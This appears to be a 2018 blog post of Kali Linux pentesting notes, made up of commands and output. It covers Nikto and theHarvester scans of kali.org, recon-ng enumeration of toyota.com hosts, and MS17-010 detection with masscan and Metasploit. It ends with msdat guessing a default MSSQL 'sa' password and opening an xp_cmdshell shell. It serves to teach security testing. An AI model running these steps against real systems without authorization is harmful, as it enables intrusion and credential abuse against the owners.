Tuesday 7 August 2018

Kali Linux


Kali Linux
Nikto Web Scanner:
root@kali:/# nikto -h kali.org -p 80
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.124.249.10
+ Target Hostname:    kali.org
+ Target Port:        80
+ Start Time:         2018-08-07 04:59:05 (GMT-4)
---------------------------------------------------------------------------
+ Server: Sucuri/Cloudproxy

theHarvester:
root@kali:~# theharvester -d kali.org -b google

recon-ng
[recon-ng][default] > show workspaces
[recon-ng][default] > workspaces add toyota
[recon-ng][toyota] > show domains
[recon-ng][toyota] > add domains
domain (TEXT): toyota.com
[recon-ng][toyota] > show domains
  +------------------------------------------------+
  | rowid |   domain     |    module         |
  +------------------------------------------------+
  | 1         | toyota.com | user_defined |
  +------------------------------------------------+
[*] 1 rows returned

[recon-ng][toyota] > use google_site_web
[recon-ng][toyota][google_site_web] > run
[recon-ng][toyota][google_site_web] > show hosts
  | 3     | www.toyota.com  |                 |        |         |          |           | google_site_web |

[recon-ng][toyota] > use bing_domain_web
[recon-ng][toyota][bing_domain_web] > run
[recon-ng][toyota][bing_domain_web] > show hosts
 | 602   | www.fleet.toyota.com  |     |        |         |     |    | bing_domain_web |

[recon-ng][toyota] > use hackertarget
[recon-ng][toyota][hackertarget] > run
[recon-ng][toyota][hackertarget] > show hosts
 | 41    | toyota.com  | 107.154.75.95   |        |         |          |           | hackertarget    |

[recon-ng][toyota] > use recon/hosts-hosts/resolve
[recon-ng][toyota][resolve] > run
[recon-ng][toyota][resolve] > show hosts
 | 3     | www.toyota.com  | 54.239.216.57   |   |   |     |      | google_site_web |

[recon-ng][toyota] > use brute_hosts
[recon-ng][toyota][brute_hosts] > run
[recon-ng][toyota][brute_hosts] > show hosts
  | 772   | www.toyota.com | 13.33.172.193   |        |         |      |      | brute_hosts  

[recon-ng][toyota] > use mx_spf_ip
[recon-ng][toyota][mx_spf_ip] > run
[*] Retrieving MX records for toyota.com.
[*] [host] mxa-001f1301.gslb.pphosted.com (<blank>)
[*] [host] mxb-001f1301.gslb.pphosted.com (<blank>)
[recon-ng][toyota][mx_spf_ip] > show hosts
  | 675   | mxa-001f1301.gslb.pphosted.com  |   |  |  | |           | mx_spf_ip 

[recon-ng][toyota] > use reporting/xlsx
[recon-ng][toyota][xlsx] > run
[*] All data written to '/root/.recon-ng/workspaces/toyota/results.xlsx'.



Detect MS17-010 SMB vulnerability using Metasploit:
root@kali:/# netdiscover -r 10.12.0.0/24
root@kali:/# masscan -p135,445 10.12.0.21
Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2018-08-21 07:23:08 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [2 ports/host]
Discovered open port 445/tcp on 10.12.0.21
Discovered open port 135/tcp on 10.12.0.21
root@kali:/# msfconsole
msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(scanner/smb/smb_ms17_010) > set rhosts 10.12.0.21
msf auxiliary(scanner/smb/smb_ms17_010) > run
[+] 10.12.0.21:445       - Host is likely VULNERABLE to MS17-010! - Windows Server 2003 R2 3790 Service Pack 2 x86 (32-bit)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

#################################################
https://haveibeenpwned.com/

#################################################
msdat: Microsoft SQL Database Attacking Tool
sudo apt-get install freetds-dev
root@kali:/msdat# vim /etc/freetds/freetds.conf
#Add "use ntlmv2 = yes" in your freetds configuration file
[global]
        # TDS protocol version
        tds version = auto
        use ntlmv2 = yes
git clone https://github.com/quentinhardy/msdat.git
root@kali:/# cd /msdat/
root@kali:/msdat# ./msdat.py passwordguesser -s 10.0.0.23
[1] (10.0.0.23:1433): Searching valid accounts on the 10.0.0.23 server, port 1433
The login sa has already been tested at least once. What do you want to do:                                                                            | ETA:  00:00:00
- stop (s/S)
- continue and ask every time (a/A)
- continue without to ask (c/C)
c
100% |#################################################################################################################################################| Time: 00:00:01
[+] Accounts found on 10.0.0.23:1433/master: {'sa': 'sa'}
root@kali:/msdat# ./msdat.py xpcmdshell -s 10.0.0.23 -U 'sa' -P 'sa' --shell
[1] (10.0.0.23:1433): Trying to get a shell thanks to xpcmdshell
10.0.0.23$hostname

Posted by at